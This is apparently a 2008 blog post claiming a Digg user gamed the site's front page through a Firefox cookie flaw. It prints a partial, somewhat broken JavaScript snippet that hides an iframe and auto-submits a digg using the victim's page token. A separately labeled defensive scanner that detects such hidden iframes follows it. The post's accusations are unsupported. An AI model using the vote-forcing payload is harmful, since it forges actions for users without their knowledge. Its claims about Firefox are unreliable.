Friday, October 17, 2008

Exploit Digg With Firefox Just like Mrbabyman




Once upon a time there was a man who exploited Mozilla's Firefox and controlled an entire social network. If you took the time to watch the video, which was a screen shot of the details I and others found using Firefox's browser, you can clearly see that a number of his diggs received the exact same number of diggs in a 24-hour period. How is this possible? Keep reading and I will tell you.

Ever wonder why some of the best articles never make it to the top, or get killed before they have a chance? Blame Mozilla Firefox. Welcome to the secret land of the elite diggist. Everyone knows these circles exist, but people seldom talk about them. These people know the algorithms to get there and have the friend structure to aid the process. I wondered why someone would want to manipulate an online medium such as Digg, and for a while I was clueless. That was until I received my first front page on Digg. The wave of traffic crashed my server. It was then that I realized controlling Digg could prove to be very profitable.

My next question was: how are they doing it? Through my research I was led to one of the key players in the game. I will not mention the other party's name in this article, but if you take the time to do the research like I have, you will easily see the links.

I stumbled upon the code by accident: a small string of characters that exploits Firefox's vulnerabilities in cookies, thus allowing the user to forcefully add a person without their knowledge. This, mixed with the fact that most users blind digg their friends, allowed him to take over the front pages time and time again. But this wasn't the only thing.

I dug a little deeper into this Mozilla bug and came up with the exact script, or a close replica of the one that he is using, to cause select machines to auto-digg a story. The user would have no clue, unless they check their logs to see.

The code looked something like this. I will not post it in its entirety for fear of being sued.

var DiggCode =
'Diggcode.Request('
+ '"/diginfull",'
+ '{'
+ 'method:"post",'
+ 'parameters:"id=6830157&row=1&type=s&pagetype=4&digcheck="'
+ '+this.contentWindow.document.forms.f1.digcheck.value,'
+ 'onSuccess:(window.opener?window.close:null)'
+ '}'
+');';

document.body.innerHTML +=
+ '\u003Ciframe height=0 '
+ 'src=\'/tools/diggthis.php?u=http%3A//www.mozilla.org/log/2008/04/asaph-1-0\''
+ 'onload=\''+DiggCode+mrbabyman'\'\\u003E\\u003C/iframe\\u003E';
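
A defensive check for the pattern in the snippet above (a zero-height iframe whose inline onload handler reads a form field from the framed page and sends a POST), as an added example that is not code from the original post. A handler like this can only read the framed form when it runs in the same origin as the framed page, so the scan is meant for markup your own site stores or serves; the function names, sample markup, field names and endpoints below are constructed placeholders.

```javascript
// Decode \uXXXX escapes (single- or double-escaped) so "\u003Ciframe" becomes "<iframe".
function decodeUnicodeEscapes(text) {
  return text.replace(/\\+u([0-9a-fA-F]{4})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Return one finding per <iframe> tag that is visually hidden AND carries an
// inline onload handler that reaches into the framed document or sends a request.
function findHiddenIframeTokenReads(source) {
  const markup = decodeUnicodeEscapes(source);
  const findings = [];
  const tagPattern = /<iframe\b[^>]*>/gi;
  let match;
  while ((match = tagPattern.exec(markup)) !== null) {
    const tag = match[0];
    const hidden =
      /\b(height|width)\s*[:=]\s*['"]?0(?![\d.])/i.test(tag) ||
      /display\s*:\s*none|visibility\s*:\s*hidden/i.test(tag);
    const hasOnload = /\bonload\s*=/i.test(tag);
    const readsFrame = /contentWindow|contentDocument/i.test(tag);
    const readsForm = /\.forms\b/i.test(tag);
    const sendsRequest =
      /method\s*:\s*["']?post|XMLHttpRequest|\.Request\s*\(/i.test(tag);
    if (hidden && hasOnload && (readsFrame || sendsRequest)) {
      findings.push({ offset: match.index, readsFrame, readsForm, sendsRequest });
    }
  }
  return findings;
}

// Constructed sample: escaped, hidden iframe whose onload reads a form token.
const SAMPLE_SUSPICIOUS =
  "\\u003Ciframe height=0 src='/tools/example.php?u=placeholder' " +
  "onload='Example.Request(\"/vote\",{method:\"post\",parameters:\"token=\"" +
  "+this.contentWindow.document.forms.f1.token.value})'\\u003E\\u003C/iframe\\u003E";

// Constructed samples: an ordinary visible embed, and a hidden frame with no handler.
const SAMPLE_VISIBLE_EMBED =
  '<iframe height="315" width="560" src="https://video.example/embed/1"></iframe>';
const SAMPLE_HIDDEN_NO_HANDLER =
  '<iframe height="0" width="0" src="/static/blank.html"></iframe>';

console.log(findHiddenIframeTokenReads(SAMPLE_SUSPICIOUS));
console.log(findHiddenIframeTokenReads(SAMPLE_VISIBLE_EMBED).length);
```
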


In the coming weeks I will be posting more about this exploit and other Firefox bugs. I ask that you become a subscriber to this blog to remain updated. Thank you.

If you are reading this, it means you got the chance to see this blog before the power players bury it. I ask that you continue to make posts about it and spread the word. It's Us against Them.